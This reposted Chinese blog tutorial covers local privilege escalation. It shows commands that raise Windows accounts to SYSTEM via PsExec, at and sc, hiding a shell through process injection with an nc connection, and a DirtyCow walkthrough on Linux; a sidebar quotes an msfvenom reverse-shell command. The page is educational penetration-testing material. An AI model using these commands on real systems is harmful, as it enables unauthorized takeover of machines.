Kali Linux渗透测试之提权(一)——本地提权

最新推荐文章于 2024-05-08 13:52:39 发布
最新推荐文章于 2024-05-08 13:52:39 发布
阅读量2.6k 收藏 5
点赞数 3
分类专栏: 渗透测试-提权
原文链接:https://blog.csdn.net/qq_38684504/article/details/89323513
版权

目录

本地提权

Windows系统用户权限划分

Linux系统用户权限划分

1. Windows系统下进行提权

(1)查看当前用户的信息;(前提:进行提权的用户是administrator权限)

(2)提权——Psexec

(3)提权——At

(4)使所有cmd命令行窗口都是以system权限打开

(6)注入进程提权,隐蔽痕迹——Pinjecter

2. Linux系统下进行提权

本地提权

目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离,针对不同的应用,对应不同的账户,不同的账户在对应不同的权限;

本地提权一般用于已经获取到了本地低权限的账号,希望获取更高的权限,实现对目标的进一步控制;

简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限,权限控制是WINDOWS、Linux等系统安全的基石,也是一切安全软件的基石,一旦这道门槛被突破,任何防御措施都是无效的。

Windows系统用户权限划分

system:中文意思是系统,在Windows中拥有比管理员更大的权限,在Windows中主要作为系统服务或进程的运行账户,保证系统服务的正常运行;

administrator:中文意思就是“系统管理员”。即所谓的“超级用户”。每台电脑装上系统后,在你自己新建的账户外,会自动新建一个叫administrator 的管理计算机(域)的内置账户,它平时是隐藏的,它是计算机管理员的意思,是拥有计算机管理的最高权限;

user:隶属于users组,这个组的用户无法进行有意或无意的改动,因此,用户可以运行经过验证的应用程序,但不可以运行大多数旧版应用程序,users组是最安全的组,因为分配给改组的默认权限不允许成员修改操作系统的设置或用户资料;users可以创建本地组,但只能修改自己创建的本地组。users可以关闭工作站,但不能关闭服务器。

Linux系统用户权限划分

user:普通用户;

root:管理员用户,具有系统中所有的权限;

1. Windows系统下进行提权

administrator权限——>system权限)注意:最终目的是获取system权限

(1)查看当前用户的信息;(前提:进行提权的用户是administrator权限)

(2)提权——Psexec

SysInternal Suite工具集下载链接

https://technet.microsoft.com/en-us/sysinternals/bb545027

Psexec -i -s cmd;       #使用Psexec工具打开system权限的cmd窗口,其中:i表示交互式,s表示system;

(3)提权——At

系统调度任务的命令(win7及以后版本系统,不再支持 at 命令

at 14:53 /interactive cmd      #以system的权限打开cmd,之后在此cmd打开的应用都是system的权限;

(4)使所有cmd命令行窗口都是以system权限打开

前面的操作都是在单个的cmd窗口中打开system权限的窗口,那么如何使在这个桌面上打开的窗口都是system权限的窗口;

system权限的窗口中打开任务管理器(taskmgr),然后结束桌面进程,创建一个新的桌面进程(explorer),以后在桌面中打开的cmd窗口都是以system权限运行的;

(5)采用服务的方式去提权

采用服务的方式去提权,这是因为所有的服务都会默认以system账号去启动,所以借助这个思路,去创建一个服务(打开cmd的服务),之后启动这个服务,打开的cmd命令行窗口就是以system权限启动的;

由于Win7及后期版本系统不再支持at命令,可以使用sc命令,举例如下:

sc Create syscmd binPath= "cmd /K start" type= own type= interact

解释:创建一个名叫sysycmd(随便起名)的系统服务,服务执行的命令是cmd /K start,服务类型为own,由启动的账号所拥有,type= interact意思是服务类型是交互式的类型(就是有界面,不是后台)

cmd /K start:该命令为打开一个新的窗口

方法1:可以直接图形化方式开启服务,点击“启动”;

方法2:也可以使用命令行的方式开启服务;(sc start syscmd

(6)注入进程提权,隐蔽痕迹——Pinjecter

pinjector.exe下载的网址(需要fan q)

http://www.tarasco.org/security/Process_Injector/

6.1> 查看pinjecter中可选的参数;

6.2> 查看所有进程ID,找到要注入的进程(system权限的进程)

6.3> 注入到正常的进程,实现隐藏,在操作系统中没有增加任何新的进程;

6.4> 在kali中连接注入进程的端口nc 192.168.37.130 5555;

和使用nc 获得shell操作基本一样

2. Linux系统下进行提权

(前提:已经成功登录一个普通账户)

1. Dirtycow(脏牛)提权

1.1> 下载脏牛的软件包,并将dirty.c文件进行编译,生成可执行文件exp;

1.2> 运行exp文件,并设置密码;

1.3> 查看passwd文件;

1.4> 切换账户,此时的用户firefart用户就具有管理员root的权限;


————————————————
版权声明:本文为CSDN博主「橘子女侠」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_38684504/article/details/89323513

清尘大哥
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
操作系统权限提升(十八)之Linux提权-内核提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-27 2722
内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节:1、对目标系统进行信息收集,获取到系统内核信息及版本信息;2、根据内核版本获取其对应的漏洞以及EXP3、使用找到的EXP对目标系统发起攻击,完成提权操作EXP该怎么着呢,可以用Kali去寻找,kali中自带searchsploit命令可以查找EXP,输入对应的版本号就可以查找相应的漏洞输入就会自动复制该文件到当前目录。
【内网安全】——Linux提权姿势
Demo不是emo的博客
02-08 5403
Linux提权姿势汇总
Kali将用户权限永久提升为root
ianTok
10-02 4671
Kali
Linux常用六种提权方式
最新发布
qq_59102311的博客
05-08 1681
SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。为可执行文件添加suid权限的目的是简化操作流程,让普通用户也能做一些高权限才能做的的工作。但是如果某些现有的二进制文件和实用程序具有SUID权限的话,就可以在执行时将权限提升为root。原理:SUID提权的原理与Linux进程的UID有关,进程在运行的时候有以下三个UID:(A)Real UID:执行该进程的用户的UID。
Kali Linux渗透测试——提权
Captain_RB的博客
03-03 4198
Kali Linux渗透测试——提权 笔记内容参考安全牛苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——提权一、关于权限(一)WindowsNT(二)Linux 一、关于权限 对不同的用户设置合适的权限是保证多任务操作系统安全的重要一环,取得shell并拿到系统权限,就相当于完全掌握了攻击目标的控制权。设置用户权限的一个基本原则即:设置最少的服务,分配最小...
Linux提权详解(一)
胖虎的博客
10-30 643
Linux提权方法和详解
如何安装测试系统kali
05-11
安装 Kali Linux 系统可以通过以下步骤进行: 从 Kali Linux 官网下载最新的ISO镜像文件 [4...最后,手机也可以安装 Kali Linux,不过需要安装一个安卓 Cyanogenmod 系统(cm-13等)的 ROM,然后再安装一个 kali-nethu
利用“Kali Linux”与“Docker”技术进行渗透测试实验.pdf
09-06
Kali Linux 是一个基于 Debian 的 Linux 发行版,面向专业的渗透测试和安全审计,由国外的“Offensive Security”公司维护和资助。它预装了许多渗透测试软件,如 Nmap、Sqlmap、Metasploit、Aircrack-ng 等。Kali ...
kali linux web渗透课程
02-21
51CTO课程,玄魂主讲,kali linux web 渗透测试——初级教程
渗透技术之——漏洞扫描工具安装与注册.docx
07-10
Kali Linux 是一个专门用于渗透测试和安全审计的操作系统,内置了大量的安全工具。本篇将详细介绍如何在Kali Linux中安装和配置漏洞扫描工具Nessus。 Nessus是一款功能强大的网络漏洞扫描器,它能自动检测网络上的...
kali-权限提升】(4.1)假冒令牌攻击、本地提权:流程
08-07 1108
kali-权限提升】假冒令牌攻击、本地提权
kali的基础linux命令
SHI_GUANG123的博客
10-17 1640
命令执行结果中,每个部分是一个网卡,此处我这里有两个网卡:eth0 和 lo 在kali中,网卡的命名格式:ethX,第一个网卡的名字是eth0,第二个网卡eth1,第三个网卡 eth2....安装kalil的过程中,并未设置root的密码,而是创建了一个普通用户,并且未普通用户设置了一个密 码。注意:如果打开后,发现是空白的,则说明文件路径错误,或者文件名错误。vi后面的文件如果是存在的,那么这个文件就被打开了。vi后面的文件如果是不存在的,那么就会创建这个文件。在写文件路径的时候,最好从根目录开始写。
kali的基础和命令
sxc25257758的博客
10-17 386
1.kali也是linux中的一种,因此管理员用户就是:root2.安装kalil的过程中,并未设置root的密码,而是创建了一个普通用户,并且未普通用户设置了一个密码。
Kalikali主要工具使用说明(文末附超全思维导图)
热门推荐
PP_zi的博客
05-11 3万+
本文为《从实践中学习Kali Linux渗透测试》总结笔记,仅供学习使用,禁止用于非法用途,转载请附上原文链接! 1. 信息收集 1.1 发现主机 traceroute 获取目标主机的路由条目,确定网络拓扑。每一跳表示一个网关,星号可能为防火墙导致。 1.1.1 扫描主机 ① nmap nmap -sP ip/ip段 对目标主机实施ping扫描,探测主机是否在线 也可以通过其他语法,扫描主机开放端口、使用的操作系统等 ② Netdiscover ARP侦查工具,可以扫描IP地址,检查在线主机。 .
Kali与Shell编程 -- 用户和用户组管理(二)
Kali与编程
05-23 842
一、课前声明 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali与编程,学习更多网络攻防干货! 二、知识点详解 useradd 添加新用户 1.基本语法 useradd 用户名 (功能描述:添加新用户) useradd -g 组名 用户名 (功能描述:添加新用户到某个组) passwd 设置用户密码 2.基本语法 passwd 用户名 (功能描述:设置用户密码) id 查看用户是否存在 3.基本语法 id 用户名 cat /etc/passwd 查看创建了哪些用户 su 切换用户 1.基
linux 提权总结_linux提权,2024年最新高级网络安全晋升之View渲染机制
2401_83974660的博客
04-17 1022
那就可以全局搜索一下某些运维程序/文件是否有suid(root属主)权限,如果有的话,可以查看文件看看调用了哪些命令,然后就可以在环境变量里面做些手脚提权。1.sudo是以root权限去运行一个命令,且不需要知道root用户的密码,只需要知道本用户的密码(su则是切换用户,su root需要知道root用户的密码)如果碰到sudoers文件使用黑名单的情况,比如说权限禁用sudo使用find命令,但是都是在ALL基础上设置的,那么可以cp把find复制到其它目录运行。
linux提权基础
学生
11-04 906
Linux提权思路
kali下msf提权
失心少年
09-23 4726
生成木马 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置监听程序 Msfconsole 打开Metaploit msf > use exploit/multi/handler s...
Kali实战-提权
小水池
05-28 4559
本地提权 windows默认账号 user Administrator System #最高权限 关系图示: Linux默认账号 User Root ADMIN提权为SYSTEM 思路:利用windows中以system运行的程序进行操作,将系统提权 win xp、win2003 at 18:12(时间) /interactive cmd ...
kali linux安全渗透教程新手版v3. 0.pdf
06-27
kali linux安全渗透教程新手版v3.0.pdf》是一本系统地介绍Kali Linux渗透测试的入门教程。本书主要分为7个部分,包括基础概念、Linux基础、Kali Linux下的常见命令、信息搜集、漏洞利用、Web渗透、后渗透以及编写自己的渗透工具。 这本教材非常适合对渗透测试有兴趣的新手阅读学习。在第一个部分,作者详细地解释了渗透测试的概念,以及渗透测试所涉及到的法律、道德、安全风险等问题,让读者对渗透测试有了清晰的认识。 在后续的部分中,作者介绍了Kali Linux的基础知识,包括命令行的基本操作、文本编辑器、用户管理、软件安装等。接着,作者深入讲解了渗透测试的核心技术——信息搜集、漏洞利用以及Web渗透,以实际案例为例,帮助读者深入理解渗透测试的实践。 除此之外,本书还介绍了后渗透和编写自己的渗透工具的内容,帮助读者了解渗透测试完整的流程和思路。 总之,《kali linux安全渗透教程新手版v3.0.pdf》是一本非常权威、实用的入门教程,对于想要深入学习渗透测试的读者来说,是一本不可多得的好书。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值